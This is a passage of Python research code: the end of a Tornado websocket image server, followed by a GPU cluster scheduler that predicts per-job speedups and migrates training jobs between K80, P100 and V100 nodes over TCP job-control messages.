            try:
                self.ioloop.add_callback(client.send_image, index)
            except tornado.websocket.WebSocketClosedError:
                try:
                    # remove() needs the stale client as its argument
                    self.connected_clients.remove(client)
                except KeyError:
                    pass
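# A minimal usage sketch (not part of the original module), assuming the
# monitor writes quicklook images named 'latest_<index>.png' into the working
# directory and calls update() whenever one of them changes.
if __name__ == '__main__':
    import time as _time
    server = WebServer('png', port=8080)
    server.start()  # serves http://localhost:8080/ and pushes images over the websocket
    try:
        server.update('latest_0.png')  # push a refreshed image to all connected clients
        _time.sleep(60)                # keep serving for a minute in this sketch
    finally:
        server.stop()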
main.py
import pdb import time import os import subprocess import re import random import json import numpy as np import glob from tensorboard.backend.event_processing.event_accumulator import EventAccumulator import socket import argparse import threading import _thread import signal from datetime import datetime import csv from sklearn import neighbors import gpu_pwr parser = argparse.ArgumentParser(description='TCP client') parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase') args = parser.parse_args() with open('job_queue.json', 'r') as fp: queue = json.load(fp) queue_dict = {} arrival_time = 0 for item in queue: arrival_time += np.random.poisson(30) queue_dict[item] = arrival_time queue_timer = time.time() queue_delay = {} for item in queue: queue_delay[str(item)] = 0 job_start = {} #{'49': time1, '15': time2...} JCT = {} for item in queue: JCT[str(item)] = 0 completion = {} for item in queue: completion[str(item)] = 0 overhead = {} # initialize so that every job starts with 0s overhead time for item in queue: overhead[str(item)] = 0 ovhd_start = {} # initialize this to 0 as well for item in queue: ovhd_start[str(item)] = 0 b_start = {} # initialize this to 0 as well for item in queue: b_start[str(item)] = 0 c_start = {} # initialize this to 0 as well for item in queue: c_start[str(item)] = 0 d_start = {} # initialize this to 0 as well for item in queue: d_start[str(item)] = 0 ovhd_a = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_a[str(item)] = [] ovhd_b = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_b[str(item)] = [] ovhd_c = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_c[str(item)] = [] ovhd_d = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_d[str(item)] = [] ovhd_total = {} # {1: [10, 12, ...], 2: [xx]} for item in queue: ovhd_total[str(item)] = [] k80_1st = {} for item in queue: k80_1st[str(item)] = [] p100_1st = {} for item in queue: p100_1st[str(item)] = [] v100_1st = {} for item in queue: v100_1st[str(item)] = [] num_mig = {} # initialize migration time to 0 for item in queue: num_mig[str(item)] = 0 V100_epoch_time = {} for item in queue: V100_epoch_time[str(item)] = 0 K80_epoch_time = {} for item in queue: K80_epoch_time[str(item)] = 0 P100_epoch_time = {} for item in queue: P100_epoch_time[str(item)] = 0 K80_start_time = {} for item in queue: K80_start_time[str(item)] = 0 P100_start_time = {} for item in queue: P100_start_time[str(item)] = 0 V100_start_time = {} for item in queue: V100_start_time[str(item)] = 0 promote_start_time = {} for item in queue: promote_start_time[str(item)] = 0 V100_demote_list = [] P100_demote_list = [] K80_time = {} for item in queue: K80_time[str(item)] = 0 P100_time = {} for item in queue: P100_time[str(item)] = 0 V100_time = {} for item in queue: V100_time[str(item)] = 0 gpu_usage_time = [] # don't initialize this gpu_usage = [] gpu_usage_completion = [] speedup_dict_V100 = {} for item in queue: speedup_dict_V100[str(item)] = 0 speedup_dict_P100 = {} for item in queue: speedup_dict_P100[str(item)] = 0 predict_dict_V100 = {} for item in queue: predict_dict_V100[str(item)] = 0 predict_dict_P100 = {} for item in queue: predict_dict_P100[str(item)] = 0 birthplace = {} for item in queue: birthplace[str(item)] = 'none' index = 0 all_jobs_started = False K80_cap = 16 P100_cap = 4 V100_cap = 4 K80_used = 0 P100_used = 0 V100_used = 0 K80_job = {} for i in range(K80_cap): K80_job[str(i)] = 'idle' P100_job = {} for i in range(P100_cap): P100_job[str(i)] = 'idle' V100_job = {} for i in 
range(V100_cap): V100_job[str(i)] = 'idle' qualified_job = [] step1_job_P100 = [] step1_job_V100 = [] step2_job = [] pc_job = [] K80_node = ['c2179', 'c2183'] P100_node = ['c2189'] V100_node = ['d1015'] host_node = 'c0172' testcase = args.tc ### also, change .h5 file folder in jobs ### INTERVAL = 30 # make decision every 30s run_log = open('run.log','w') def K80_LUT(gpu): quotient = int(gpu) // 8 remainder = int(gpu) % 8 real_node = K80_node[quotient] real_gpu = str(remainder) return real_node, real_gpu def P100_LUT(gpu): quotient = int(gpu) // 4 remainder = int(gpu) % 4 real_node = P100_node[quotient] real_gpu = str(remainder) return real_node, real_gpu def V100_LUT(gpu): quotient = int(gpu) // 4 remainder = int(gpu) % 4 real_node = V100_node[quotient] real_gpu = str(remainder) return real_node, real_gpu ######################### do a regression fit ######################## with open('v100_meas_data/x1_data.json') as f: x1_v100 = json.load(f) with open('v100_meas_data/x2_data.json') as f: x2_v100 = json.load(f) with open('v100_meas_data/x3_data.json') as f: x3_v100 = json.load(f) x1_norm = [(i - min(x1_v100)) / (max(x1_v100) - min(x1_v100)) for i in x1_v100] x2_norm = [(i - min(x2_v100)) / (max(x2_v100) - min(x2_v100)) for i in x2_v100] x3_norm = [(i - min(x3_v100)) / (max(x3_v100) - min(x3_v100)) for i in x3_v100] # create training data x_train = [] for i in range(len(x1_norm)): x_train.append([x1_norm[i], x2_norm[i], x3_norm[i]]) with open('v100_meas_data/y_data_KV.json') as f: y_train_KV = json.load(f) model_V100_KV = neighbors.KNeighborsRegressor(n_neighbors = 3, weights='distance') model_V100_KV.fit(x_train, y_train_KV) with open('v100_meas_data/y_data_KP.json') as f: y_train_KP = json.load(f) model_V100_KP = neighbors.KNeighborsRegressor(n_neighbors = 3, weights='distance') model_V100_KP.fit(x_train, y_train_KP) with open('p100_meas_data/x1_data.json') as f: x1_p100 = json.load(f) with open('p100_meas_data/x2_data.json') as f: x2_p100 = json.load(f) with open('p100_meas_data/x3_data.json') as f: x3_p100 = json.load(f) x1_norm = [(i - min(x1_p100)) / (max(x1_p100) - min(x1_p100)) for i in x1_p100] x2_norm = [(i - min(x2_p100)) / (max(x2_p100) - min(x2_p100)) for i in x2_p100] x3_norm = [(i - min(x3_p100)) / (max(x3_p100) - min(x3_p100)) for i in x3_p100] # create training p100 x_train = [] for i in range(len(x1_norm)): x_train.append([x1_norm[i], x2_norm[i], x3_norm[i]]) with open('p100_meas_data/y_data_KP.json') as f: y_train_KP = json.load(f) model_P100_KP = neighbors.KNeighborsRegressor(n_neighbors = 3, weights='distance') model_P100_KP.fit(x_train, y_train_KP) with open('p100_meas_data/y_data_KV.json') as f: y_train_KV = json.load(f) model_P100_KV = neighbors.KNeighborsRegressor(n_neighbors = 3, weights='distance') model_P100_KV.fit(x_train, y_train_KV) #################################################################### def send_signal(node, cmd): # Create a TCP/IP socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) port = 10000 # Connect the socket to the port where the server is listening server_address = (node, int(port)) print('connecting to {} port {}'.format(*server_address), file=run_log, flush=True) sock.connect(server_address) try: # Send data message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35' print('sending {!r}'.format(message), file=run_log, flush=True) sock.sendall(message) while True: data = sock.recv(32) if 'success' in data.decode('utf-8'): # print('received {!r}'.format(data)) break else: print('waiting for success signal', 
file=run_log, flush=True) time.sleep(1) finally: #print('closing socket') sock.close() def max_speedup_promotion_P2V(V100_free, promote_list): num_promote = len(promote_list) global speedup_dict_V100 # selectively promote among active V100 jobs and promote list jobs V100_pool = promote_list if num_promote <= V100_free: # promote all jobs as well return promote_list[:], [] else: # promote the top 4 jobs pool_dict = {} V100_avail = V100_free for job in V100_pool: if job in speedup_dict_V100: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail] promotion_list = list(set(promote_list).intersection(sorted_pool)) demotion_list = [] return promotion_list, demotion_list def max_speedup_promotion_V100(V100_free, promote_list, demote_list): num_promote = len(promote_list) global speedup_dict_V100 # selectively promote among active V100 jobs and promote list jobs V100_pool = list(set(demote_list).union(promote_list)) if num_promote <= V100_free: # promote all jobs as well return promote_list[:], [] else: # promote the top 4 jobs pool_dict = {} V100_avail = V100_free + len(demote_list) for job in V100_pool: if job in speedup_dict_V100: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:V100_avail] promotion_list = list(set(promote_list).intersection(sorted_pool)) demotion_list = list(set(demote_list).difference(sorted_pool)) if 'idle' in demotion_list: demotion_list.remove('idle') # this includes force demotion # lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with # K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job # in sorted pool for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True): if job_demote in demotion_list: for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False): if job_promote in promotion_list: if speedup_dict_V100[job_promote] - speedup_dict_V100[job_demote] < 0.3: demotion_list.remove(job_demote) promotion_list.remove(job_promote) break return promotion_list, demotion_list def max_speedup_promotion_P100(P100_free, promote_list, demote_list): num_promote = len(promote_list) global speedup_dict_P100 # selectively promote among active P100 jobs and promote list jobs P100_pool = list(set(demote_list).union(promote_list)) if num_promote <= P100_free: # promote all jobs as well return promote_list[:], [] else: # promote the top 4 jobs pool_dict = {} P100_avail = P100_free + len(demote_list) for job in P100_pool: if job in speedup_dict_P100: pool_dict[job] = speedup_dict_P100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:P100_avail] promotion_list = list(set(promote_list).intersection(sorted_pool)) demotion_list = list(set(demote_list).difference(sorted_pool)) if 'idle' in demotion_list: demotion_list.remove('idle') # this includes force demotion # lazy migration, for every P100 job from high speeup to low speedup and not in sorted_pool, compare it with # K80 jobs in sorted_pool, from low speedup to high speedup. 
If difference within 0.2, replace the K80 job # in sorted pool for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True): if job_demote in demotion_list: for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False): if job_promote in promotion_list: if speedup_dict_P100[job_promote] - speedup_dict_P100[job_demote] < 0.3: demotion_list.remove(job_demote) promotion_list.remove(job_promote) break return promotion_list, demotion_list def min_speedup_demotion_V100(promote_list, demote_list): global speedup_dict_V100 K80_pool = list(set(promote_list).union(demote_list)) pool_dict = {} for job in K80_pool: if job in speedup_dict_V100: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:len(promote_list)] # least speedup jobs demotion_list = list(set(demote_list).intersection(sorted_pool)) promotion_list = list(set(promote_list).difference(sorted_pool)) # lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with # K80 jobs in sorted_pool, from low speedup to high speedup. If difference within 0.2, replace the K80 job # in sorted pool for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True): if job_demote in demotion_list: for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False): if job_promote in promotion_list: if speedup_dict_V100[job_promote] - speedup_dict_V100[job_demote] < 0.15: demotion_list.remove(job_demote) promotion_list.remove(job_promote) break return promotion_list, demotion_list def min_speedup_demotion_P100(promote_list, demote_list): # in this case available jobs have all demoted to idle K80s global speedup_dict_P100 K80_pool = list(set(promote_list).union(demote_list)) pool_dict = {} for job in K80_pool: if job in speedup_dict_P100: pool_dict[job] = speedup_dict_P100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:len(promote_list)] # least speedup jobs demotion_list = list(set(demote_list).intersection(sorted_pool)) promotion_list = list(set(promote_list).difference(sorted_pool)) # lazy migration, for every V100 job from high speeup to low speedup and not in sorted_pool, compare it with # P100 jobs in sorted_pool, from low speedup to high speedup. 
If difference within 0.2, replace the P100 job # in sorted pool for job_demote in sorted(pool_dict, key=pool_dict.get, reverse=True): if job_demote in demotion_list: for job_promote in sorted(pool_dict, key=pool_dict.get, reverse=False): if job_promote in promotion_list: if speedup_dict_P100[job_promote] - speedup_dict_P100[job_demote] < 0.15: # use 0.1 for P100 pairs demotion_list.remove(job_demote) promotion_list.remove(job_promote) break return promotion_list, demotion_list def min_speedup_demotion_free(K80_free, P100_demote_list, V100_demote_list, have_to_demote): global speedup_dict_P100, speedup_dict_V100 if have_to_demote >= K80_free: if len(P100_demote_list) + len(V100_demote_list) <= K80_free: return P100_demote_list[:], V100_demote_list[:] # returns P100 demoted, V100 demoted else: K80_pool = list(set(P100_demote_list).union(V100_demote_list)) pool_dict = {} for job in K80_pool: if job in P100_demote_list: pool_dict[job] = speedup_dict_P100[job] elif job in V100_demote_list: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_free] # least speedup jobs P100_demotion = list(set(P100_demote_list).intersection(sorted_pool)) V100_demotion = list(set(V100_demote_list).intersection(sorted_pool)) return P100_demotion, V100_demotion else: if len(P100_demote_list) + len(V100_demote_list) <= have_to_demote: return P100_demote_list[:], V100_demote_list[:] # returns P100 demoted, V100 demoted else: K80_pool = list(set(P100_demote_list).union(V100_demote_list)) pool_dict = {} for job in K80_pool: if job in P100_demote_list: pool_dict[job] = speedup_dict_P100[job] elif job in V100_demote_list: pool_dict[job] = speedup_dict_V100[job] sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:have_to_demote] # least speedup jobs P100_demotion = list(set(P100_demote_list).intersection(sorted_pool)) V100_demotion = list(set(V100_demote_list).intersection(sorted_pool)) return P100_demotion, V100_demotion def save_job(node, job): # save_job('c2176', '50') # first wait for the job to be qualified for checkpointing while True: # wait for ckpt_qual to be available global ckpt_qual_dict if ckpt_qual_dict['job'+job] == 1: ckpt_qual_dict['job'+job] = 0 break time.sleep(5) global pid_dict pid = pid_dict['job'+job] send_signal(node, 'save ' + job + ' pid ' + pid) # 'save 50 pid 10000' global ovhd_start ovhd_start[job] = time.time() time.sleep(3) # in case epoch_waste is communicate too frequently def kill_job(node, job): # kill_job('c2176', '50') send_signal(node, 'kill ' + job) # resume job def resume_job(node, gpu, job): # resume_job('c2176', '3', '50') cmd = 'resume ' + job + ' gpu ' + gpu send_signal(node, cmd) # start job def start_job(node, gpu, job): cmd = 'start ' + job + ' gpu ' + gpu send_signal(node, cmd) # function that checks the tensorboard log of currently running jobs and logs jobs that have finished the first epoch # in a global list. Once it's done, it will be in a queue to be promoted to V100 for 3 more epochs. 
def check_step1_complete_V100(job_list): log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/' global step1_job_V100 global V100_epoch_time for job in job_list: if job not in step1_job_V100 and job != 'idle': log_dir = log_path + 'job' + job + '/*' dirs = glob.glob(log_dir) dirs.sort() tc = '' for item in dirs: item_node = item.split('/')[-1].split('.')[-1] if item_node in V100_node: tc = item if tc != '': iterator = EventAccumulator(tc).Reload() tag = 'loss' try: if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time wall_time = [t.wall_time for t in iterator.Scalars(tag)] V100_epoch_time[job] = wall_time[1] - wall_time[0] step1_job_V100.append(job) print('job' + job + ' has reached step1 complete on V100', file=run_log, flush=True) except Exception: pass def check_step1_complete_P100(job_list): log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/' global step1_job_P100 global P100_epoch_time for job in job_list: if job not in step1_job_P100 and job != 'idle': log_dir = log_path + 'job' + job + '/*' dirs = glob.glob(log_dir) dirs.sort() tc = '' for item in dirs: item_node = item.split('/')[-1].split('.')[-1] if item_node in P100_node: tc = item if tc != '': iterator = EventAccumulator(tc).Reload() tag = 'loss' try: if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time wall_time = [t.wall_time for t in iterator.Scalars(tag)] P100_epoch_time[job] = wall_time[1] - wall_time[0] step1_job_P100.append(job) print('job' + job + ' has reached step1 complete on P100', file=run_log, flush=True) except Exception: pass def check_step2_complete(job_list): log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/' global step1_job_P100, step1_job_V100 global step2_job global K80_epoch_time step1_job = list(set(step1_job_P100).union(step1_job_V100)) for job in job_list: if job in step1_job and job not in step2_job and job != 'idle': log_dir = log_path + 'job' + job + '/*' dirs = glob.glob(log_dir) dirs.sort() tc = '' for item in dirs: item_node = item.split('/')[-1].split('.')[-1] if item_node in K80_node: tc = item if tc != '': iterator = EventAccumulator(tc).Reload() tag = 'loss' try: if len(iterator.Scalars(tag)) > 2: # this way we can collect one epoch time wall_time = [t.wall_time for t in iterator.Scalars(tag)] K80_epoch_time[job] = wall_time[1] - wall_time[0] step2_job.append(job) print('job' + job + ' has reached step2 complete on K80', file=run_log, flush=True) except Exception: pass # measure job def measure_job(node, gpu, job): cmd = 'measure ' + job + ' gpu ' + gpu send_signal(node, cmd) ############### first clear finish status of all jobs #################### pid_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) pid_dict[job_name] = 0 checkpoint_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) checkpoint_dict[job_name] = 0 ckpt_qual_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) ckpt_qual_dict[job_name] = 0 finish_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) finish_dict[job_name] = 0 epoch_waste_dict = {} for i in range(len(queue)): job_name = 'job' + str(i + 1) epoch_waste_dict[job_name] = 0 #################### background thread running TCP socket ######################## def thread_function(): # here listen on the socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (host_node, 10002) print('starting up on {} port {}'.format(*server_address), file=run_log, flush=True) sock.bind(server_address) 
sock.listen(5) while True: # Wait for a connection connection, client_address = sock.accept() try: while True: data = connection.recv(32) if data: data_str = data.decode('utf-8') global K80_start_time, P100_start_time, V100_start_time, promote_start_time global K80_job, P100_job, V100_job global K80_time, P100_time, V100_time global ovhd_a, ovhd_b, ovhd_c, ovhd_d, k80_1st, p100_1st, v100_1st, ovhd_start, overhead, ovhd_total global b_start, c_start, d_start, completion if 'ckpt_qual' in data_str: global ckpt_qual_dict job_name = data_str.split(' ')[0] ckpt_qual_dict[job_name] = 1 elif 'finish' in data_str: global finish_dict job_name = data_str.split(' ')[0] job = job_name.replace('job','') finish_dict[job_name] = 1 JCT[job] = int(time.time() - job_start[job]) if job in list(K80_job.values()): K80_time[job] += int(time.time() - K80_start_time[job]) elif job in list(P100_job.values()): P100_time[job] += int(time.time() - P100_start_time[job]) elif job in list(V100_job.values()): V100_time[job] += int(time.time() - V100_start_time[job]) elif 'pid' in data_str: global pid_dict job_name = data_str.split(' ')[0] pid = data_str.split(' ')[2] pid_dict[job_name] = pid elif 'checkpoint' in data_str: # can only be received after save signal is sent global checkpoint_dict job_name = data_str.split(' ')[0] job = job_name.replace('job','') checkpoint_dict[job_name] = 1 ovhd_a[job].append(int(time.time() - ovhd_start[job])) b_start[job] = time.time() elif 'waste' in data_str: global epoch_waste_dict job_name = data_str.split(' ')[0] epoch_waste_time = data_str.split(' ')[2] epoch_waste_dict[job_name] += int(epoch_waste_time) elif 'b_end' in data_str: job_name = data_str.split(' ')[0] job = job_name.replace('job','') ovhd_b[job].append(int(time.time() - b_start[job])) c_start[job] = time.time() elif 'c_end' in data_str: job_name = data_str.split(' ')[0] job = job_name.replace('job','') ovhd_c[job].append(int(time.time() - c_start[job])) d_start[job] = time.time() elif 'd_end' in data_str: job_name = data_str.split(' ')[0] job = job_name.replace('job','') ovhd_d[job].append(int(time.time() - d_start[job])) ovhd_total[job].append(int(time.time() - ovhd_start[job])) if ovhd_start[job] != 0: overhead[job] += int(time.time() - ovhd_start[job]) ovhd_start[job] = 0 if job in list(K80_job.values()): K80_start_time[job] = time.time() elif job in list(P100_job.values()): P100_start_time[job] = time.time() elif job in list(V100_job.values()): V100_start_time[job] = time.time() promote_start_time[job] = time.time() elif '1st_epoch' in data_str: # 'job50 1st_epoch 35' job_name = data_str.split(' ')[0] job = job_name.replace('job','') epoch_time = int(data_str.split(' ')[2]) if job in list(K80_job.values()): k80_1st[job].append(epoch_time) elif job in list(P100_job.values()): p100_1st[job].append(epoch_time) elif job in list(V100_job.values()): v100_1st[job].append(epoch_time) elif 'completion' in data_str: # 'job50 completion 0.33' job_name = data_str.split(' ')[0] job = job_name.replace('job','') completion_portion = float(data_str.split(' ')[2]) completion[job] = completion_portion #if 'ckpt_qual' in data_str or 'finish' in data_str or 'checkpoint' in data_str: # print('received ' + data_str) connection.sendall(b'success') #time.sleep(5) else: break finally: connection.close() x = threading.Thread(target=thread_function, daemon=True) x.start() ############################################################################### ###################################################################### while True: # 
termination condition: # all the jobs have finished ################### check for finished jobs on K80 and V100 ############################## for gpu, job in K80_job.items(): if job != 'idle': if finish_dict['job'+job] == 1: K80_used -= 1 K80_job[gpu] = 'idle' print('K80 finished job: ' + job, file=run_log, flush=True) for gpu, job in P100_job.items(): if job != 'idle': if finish_dict['job'+job] == 1: P100_used -= 1 P100_job[gpu] = 'idle' print('P100 finished job: ' + job, file=run_log, flush=True) if job in P100_demote_list: P100_demote_list.remove(job) for gpu, job in V100_job.items(): if job != 'idle': if finish_dict['job'+job] == 1: V100_used -= 1 V100_job[gpu] = 'idle' print('V100 finished job: ' + job, file=run_log, flush=True) if job in V100_demote_list: V100_demote_list.remove(job) ################ check step1 finished job of K80 jobs and step 2 of V100 ################# check_step1_complete_V100(list(V100_job.values())) # make predictions for jobs finished step1 on V100, only once for each job's lifetime for gpu, job in V100_job.items(): if job not in qualified_job and job != 'idle': if job in step1_job_V100: real_node, real_gpu = V100_LUT(gpu) kill_job(real_node, job) qualified_job.append(job) print('job' + job + ' has been qualified for demotion', file=run_log, flush=True) time.sleep(3) # wait for run.sh to finish x1, x3 = gpu_pwr.process_csv('job'+job, testcase) x2 = 3600 / V100_epoch_time[job] # preprocess the data x1 = (x1 - min(x1_v100)) / (max(x1_v100) - min(x1_v100)) x2 = (x2 - min(x2_v100)) / (max(x2_v100) - min(x2_v100)) x3 = (x3 - min(x3_v100)) / (max(x3_v100) - min(x3_v100)) speedup_pred_KV = model_V100_KV.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100 speedup_dict_V100[job] = speedup_pred_KV predict_dict_V100[job] = speedup_pred_KV speedup_pred_KP = model_V100_KP.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100 speedup_dict_P100[job] = speedup_pred_KP predict_dict_P100[job] = speedup_pred_KP check_step1_complete_P100(list(P100_job.values())) # make predictions for jobs finished step1 on P100, only once for each job's lifetime for gpu, job in P100_job.items(): if job not in qualified_job and job != 'idle': if job in step1_job_P100: real_node, real_gpu = P100_LUT(gpu) kill_job(real_node, job) qualified_job.append(job) print('job' + job + ' has been qualified for demotion', file=run_log, flush=True) time.sleep(3) # wait for run.sh to finish x1, x3 = gpu_pwr.process_csv('job'+job, testcase) x2 = 3600 / P100_epoch_time[job] # preprocess the data x1 = (x1 - min(x1_p100)) / (max(x1_p100) - min(x1_p100)) x2 = (x2 - min(x2_p100)) / (max(x2_p100) - min(x2_p100)) x3 = (x3 - min(x3_p100)) / (max(x3_p100) - min(x3_p100)) speedup_pred_KP = model_P100_KP.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100 speedup_dict_P100[job] = speedup_pred_KP predict_dict_P100[job] = speedup_pred_KP speedup_pred_KV = model_P100_KV.predict(np.array([x1, x2, x3]).reshape((1,-1)))[0] / 100 speedup_dict_V100[job] = speedup_pred_KV predict_dict_V100[job] = speedup_pred_KV check_step2_complete(list(K80_job.values())) # correct speedup predictions for job in speedup_dict_V100: if speedup_dict_V100[job] != 0 and speedup_dict_V100[job] == predict_dict_P100[job]: if K80_epoch_time[job] != 0 and V100_epoch_time[job] != 0: speedup_dict_V100[job] = (K80_epoch_time[job] - V100_epoch_time[job]) / K80_epoch_time[job] for job in speedup_dict_P100: if speedup_dict_P100[job] != 0 and speedup_dict_P100[job] == predict_dict_P100[job]: if K80_epoch_time[job] != 0 and P100_epoch_time[job] != 0: 
speedup_dict_P100[job] = (K80_epoch_time[job] - P100_epoch_time[job]) / K80_epoch_time[job] ############### record number of newly arrived jobs ################ new_arrival = 0 index_cpy = index while True: time_passed = int(time.time() - queue_timer) if index_cpy >= len(queue): break elif time_passed >= queue_dict[queue[index_cpy]]: new_arrival += 1 index_cpy += 1 elif time_passed < queue_dict[queue[index_cpy]]: break ################ make promotion decisions ######################## V100_free = V100_cap - V100_used P100_free = P100_cap - P100_used K80_free = K80_cap - K80_used if new_arrival == 0: # this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete K80_promote_list = list(set(step2_job).intersection(list(K80_job.values()))) if K80_free == K80_cap: P100_promote_list = list(set(qualified_job).intersection(list(P100_job.values()))) else: K80_promote_list = list(set(step2_job).intersection(list(K80_job.values()))) # have to finish K80 profiling # look at demote list for gpu, job in V100_job.items(): if job != 'idle' and job in step1_job_V100: if job not in V100_demote_list and job in step2_job and len(ovhd_total[job]) > 0: job_ovhd = np.mean(ovhd_total[job]) # 100 if len(k80_1st[job]) > 0: k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job] else: k80_1st_ovhd = 0 ## print('printing v100_1st ' + job + ' for debugging purpose: ' + str(v100_1st[job])) v100_1st_ovhd = np.mean(v100_1st[job]) - V100_epoch_time[job] demote_qualify_time_V100 = (2 * job_ovhd + k80_1st_ovhd + v100_1st_ovhd) / speedup_dict_V100[job] if int(time.time() - promote_start_time[job]) > max(demote_qualify_time_V100, max(v100_1st[job])): V100_demote_list.append(job) print('job' + job + 'qualified for demote for passing demote qualify time', file=run_log, flush=True) ##str(int(demote_qualify_time))) elif job not in V100_demote_list and job not in step2_job and job in qualified_job: V100_demote_list.append(job) print('job' + job + 'qualified for demote for profiling', file=run_log, flush=True) for gpu, job in P100_job.items(): if job != 'idle' and job in step1_job_P100: if job not in P100_demote_list and job in step2_job and len(ovhd_total[job]) > 0: job_ovhd = np.mean(ovhd_total[job]) # 100 if len(k80_1st[job]) > 0: k80_1st_ovhd = np.mean(k80_1st[job]) - K80_epoch_time[job] else: k80_1st_ovhd = 0 p100_1st_ovhd = np.mean(p100_1st[job]) - P100_epoch_time[job] demote_qualify_time_P100 = (2 * job_ovhd + k80_1st_ovhd + p100_1st_ovhd) / speedup_dict_P100[job] if int(time.time() - promote_start_time[job]) > max(demote_qualify_time_P100, max(p100_1st[job])): P100_demote_list.append(job) print('job' + job + 'qualified for demote for passing demote qualify time', file=run_log, flush=True) ##str(int(demote_qualify_time))) elif job not in P100_demote_list and job not in step2_job and job in qualified_job: P100_demote_list.append(job) print('job' + job + 'qualified for demote for profiling', file=run_log, flush=True) if len(K80_promote_list) > 0 or len(P100_demote_list) > 0 or len(V100_demote_list) > 0: if new_arrival == 0 and K80_free < K80_cap: # all jobs received, jobs still running on K80 promote_list_cpy = K80_promote_list[:] V100_promoted, V100_demoted = max_speedup_promotion_V100(V100_free, promote_list_cpy, V100_demote_list) if len(V100_demoted) > len(V100_promoted): print('should never happen for K80', file=run_log, flush=True) pdb.set_trace() promote_list_cpy = list(set(promote_list_cpy).difference(V100_promoted)) P100_promoted, P100_demoted = 
max_speedup_promotion_P100(P100_free, promote_list_cpy, P100_demote_list) if len(P100_demoted) > len(P100_promoted): print('should never happen for P100', file=run_log, flush=True) pdb.set_trace() elif new_arrival == 0 and K80_free == K80_cap: # all jobs received, jobs only running on P100 and V100 # when there are free V100s, promote P100 job to V100 V100_promoted, V100_demoted = max_speedup_promotion_P2V(V100_free, P100_promote_list) P100_promoted = [] P100_demoted = [] else: # first demote P100 jobs, then demote V100 jobs P100_demote_list_cpy = P100_demote_list[:] V100_demote_list_cpy = V100_demote_list[:] promote_list_cpy = K80_promote_list[:] P100_promoted, P100_demoted = min_speedup_demotion_P100(promote_list_cpy, P100_demote_list_cpy) promote_list_cpy = list(set(promote_list_cpy).difference(P100_promoted)) V100_promoted, V100_demoted = min_speedup_demotion_V100(promote_list_cpy, V100_demote_list_cpy) P100_demote_list_cpy = list(set(P100_demote_list_cpy).difference(P100_demoted)) V100_demote_list_cpy = list(set(V100_demote_list_cpy).difference(V100_demoted)) # also consider demote newly promoted job to free K80 P100_demote_list_cpy = list(set(P100_demote_list_cpy).union(P100_promoted)) V100_demote_list_cpy = list(set(V100_demote_list_cpy).union(V100_promoted)) have_to_demote = new_arrival - V100_free - P100_free P100_demoted_free, V100_demoted_free = min_speedup_demotion_free(K80_free, P100_demote_list_cpy, V100_demote_list_cpy, have_to_demote) # remove jobs that got demoted back immediately after promotion V100_promoted = list(set(V100_promoted).difference(V100_demoted_free)) P100_promoted = list(set(P100_promoted).difference(P100_demoted_free)) # 1st phase demoted and 2nd phase demote to free V100_demoted = list(set(V100_demoted).union(V100_demoted_free)) P100_demoted = list(set(P100_demoted).union(P100_demoted_free)) # make sure demoted jobs are not already in K80 promote list V100_demoted = list(set(V100_demoted).difference(K80_promote_list)) P100_demoted = list(set(P100_demoted).difference(K80_promote_list)) total_demoted = list(set(V100_demoted).union(P100_demoted)) total_promoted = list(set(V100_promoted).union(P100_promoted)) if len(V100_promoted) > 0: if new_arrival == 0: print('no new job arrivals', file=run_log, flush=True) if K80_free == K80_cap: print('jobs promoted from P100 to V100', file=run_log, flush=True) print('V100 promoted jobs: ', V100_promoted, file=run_log, flush=True) if len(P100_promoted) > 0: if new_arrival == 0: print('no new job arrivals', file=run_log, flush=True) print('P100 promoted jobs: ', P100_promoted, file=run_log, flush=True) if len(V100_demoted) > 0: print('V100 demoted jobs: ', V100_demoted, file=run_log, flush=True) if len(P100_demoted) > 0: print('P100 demoted jobs: ', P100_demoted, file=run_log, flush=True) # stop all promoted jobs on K80 checkpoint_finish_check = [] for gpu, job in K80_job.items(): if job in total_promoted: real_node, real_gpu = K80_LUT(gpu) save_job(real_node, job) if finish_dict['job'+job] != 1: K80_time[job] += int(time.time() - K80_start_time[job]) checkpoint_finish_check.append(job) 